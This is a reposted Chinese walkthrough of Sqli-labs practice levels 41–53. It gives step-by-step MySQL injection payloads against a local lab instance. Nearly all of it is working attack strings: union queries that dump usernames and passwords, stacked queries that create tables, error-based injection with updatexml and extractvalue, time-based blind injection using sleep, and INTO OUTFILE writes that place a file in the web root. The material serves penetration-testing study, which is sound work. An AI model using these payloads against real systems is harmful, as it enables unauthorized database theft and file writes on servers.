Sqli-labs闯关题41-53题,详细解答。

第四十一关:GET-BLIND based-intiger-Stacked

盲注-叠堆-整型-GET

这关和第三十九关略有不同 ,这关是盲注,错误时没有回显。就不多说。

获得版本和数据库名 ?id=0 union select 1,version(),database() %23

获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

![]()

也是可以堆叠注入的,堆叠注入语句 ?id=1;create table test41 like users;%23

第四十二关:POST-Error based-String-Stacked

报错型叠堆注入-单引号字符型 -POST

刚进来的时候 乍一看还以是二次注入,但是结合此题的标题和php的代码,都显示是叠堆注入方式,那么怎么进行处理?

![]()

Password 变量在post 过程中,没有通过 mysql_real_escape_string() 函数的处理,并且是单引号进行包裹。因此在登录的时候密码选项我们可以进行 attack。
所以我们在密码处构造:

login_user=1&login_password=li';create table Less42 like users#&mysubmit=Login

虽然显示错误,但是我们的数据库中还是已经建了表。

![]()

接下来我们就可以通过建的这个表进行数值的获取。

第四十三关:POST-Error based-String-Stacked with twist

报错型 - 堆叠注入 - 有单括号的单引号字符型 - POST

这关和上一关基本一样:login_user=1&login_password=li');create table less43 like users#&mysubmit=Login

![]()

第四十四关:POST- Error-based-String-Stacked-Blin

盲注 - 堆叠注入 - 字符型 - POST 既然是盲注,没有回显

还是一样:login_user=1&login_password=li';create table less44 like users#&mysubmit=Login

![]()

![]()

不多说。

第四十五关:POST-Error based-String-Stacked-Blind

报错型堆叠注入 - 有括号的单引号字符型 - POST-盲注无回显

login_user=1&login_password=li');create table less45 like users#&mysubmit=Login

![]()

![]()

第四十六关:GET-Error based-Numeric-ORDER BY CLAUSE

题目提示用order by语句进行注入。

select * from users order by 1 desc ;使用降序(倒序)排列

select * from users order by 1 asc ;使用升序(正序)排列

select right(database(),1);从右至左输出第一个字母

select lesft(database(),1);从左至右输出第一个字母

lines terminated by 666 每行输出以666结尾

我们看到界面后发现不一样了,之前都是id,现在变成sort了,那咱们试一下

我们输出了?sort=1后发现竟然可以得出user表的信息。不可思议。那么这一关的真正练习是什么呐?感觉这回是通过这个反推去了,让我们来熟悉一下注入语句吧!

r![]()

![]()

![]()

既然要用order by语句进行注入,那首先我们通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入

从源码看到的确是order by型注入:

![]()

http://192.168.24.140/sqli-labs-master/Less-46/?sort=1+asc (正序)

http://192.168.24.140/sqli-labs-master/Less-46/?sort=1+desc (倒序)

![]()

usernamepassword均为列名,所以以下需要知道列名

?order=if(1=1,username,password)
?order=null,if(1=1,username,password)
?order=(case when (1=1) then username else password end)
?order=ifnull(null, username)
?order=rand(1=1) //order by rand(1)/rand(0)两者返回不一样
?order=(select 1 regexp if(1=1,1,0x00))

order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句,让该语句执行结果为一个数,我们尝试

没有报错,right换成left都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入

?sort=right(version(),1) ?sort=left(version(),1) 效果是一样的,所以我们总结了一下可以有多种方法:时间延迟型盲注、布尔型盲注、报错型注入、union联合查询注入法、程序分析参数后注入、outfile参数发等。

![]()

此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式,

①直接添加注入语句,?sort=(select ******)

②利用一些函数。例如rand()函数等。?sort=rand(sql语句)

③利用and,例如?sort=1 and (加sql语句)。

同时,sql语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。

@1、报错型注入:

获取数据库名 : ?sort=1 and(updatexml(1,concat(0x7e,(select database())),0))

![]()

获取数据库的权限:

?sort=(select count(*) from information_schema.columns group by concat(0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))

![]()

获得数据库版本 : ?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

![]()

@2、布尔型盲注:

盲注获取数据库第一个字的ascii码,比较麻烦,不多说。

![]()

@3、正则表达式注入 ?sort=1 ^(select(select version()) regexp '^5')发现版本

![]()

@4、时间盲注

测试能不能时间注入?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test))

发现数据库的第一关字母?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(3))

![]()

@5、发现这关还可以outfile进行写 ?sort=1 into outfile 'C:\\phpStudy\\WWW\\sqli-labs-master\\Less-46\\li.php'

![]()

发现已经有了文件夹下已经有了

![]()

里面是密码

![]()

@6、也可以程序分析参数后注入 ?sort=1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

![]()

@7、也可以用叠堆注入方法创建一个表。

第四十七关:GET-Error based-String-ORDER BY CLAUSE

基于单引号的order by注入:

语句基本和上一关一样,只需要加一下单引号

获取数据库使用权限:

?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+

![]()

获得数据库版本 :

![]()

当然也可以时间盲注 ?sort=1' and If(ascii(substr(database(),1,1))=116,0,sleep(3))--+

![]()

第四十八关;GET-Error based-Blind-Numeric-ORDER BY CLAUSE

可以看出这关是order by盲注、数字型

布尔盲注: ?sort=rand(ascii(left(database(),1))=178)

![]()

时间盲注: ?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(3))--+

![]()

第四十九关:GET-Error based-String-Blind-ORDER BY CLAUSE

这关是盲注 order by 单引号字符型盲注,没有错误回显

?sort=1' and If(ascii(substr(database(),1,1))=116,0,sleep(3))--+

![]()

这关还可以outfile进行写 入: ?sort=1 into outfile 'C:\\phpStudy\\WWW\\sqli-labs-master\\Less-49\\li.php'

第五十关:GET-Error based--ORDER BY CLAUSE-numeric-Stacked

injection

这关我们就用堆叠注入 ?sort=1;create table test50 like users;%23

![]()

去数据库里看,发现有了

![]()

第五十一关:GET-Error based-ORDER BY CLAUSE-String-Stacked injection

GET-ORDER BY-叠堆注入-字符型

?sort=1';create table test51 like users;%23

第五十二关:GET-Blind-based-ORDER BY CLAUSE-numeric-Stacked injection

GET-盲注无回显-ORDER BY-叠堆注入法-数字型

?sort=1;create table test52 like users;%23

第五十三关:GET-GET-Blind-based-ORDER BY CLAUSE-String-Stacked injection

GET-盲注-ORDER BY-叠堆型注入-字符型注入

?sort=1';create table test53 like users;%23

声明:该文章系转载,转载该文章的目的在于更广泛的传递信息,并不代表本网站赞同其观点,文章内容仅供参考。

本站是一个个人学习和交流平台,网站上部分文章为网站管理员和网友从相关媒体转载而来,并不用于任何商业目的,内容为作者个人观点, 并不代表本网站赞同其观点和对其真实性负责。

我们已经尽可能的对作者和来源进行了通告,但是可能由于能力有限或疏忽,导致作者和来源有误,亦可能您并不期望您的作品在我们的网站上发布。我们为这些问题向您致歉,如果您在我站上发现此类问题,请及时联系我们,我们将根据您的要求,立即更正或者删除有关内容。本站拥有对此声明的最终解释权。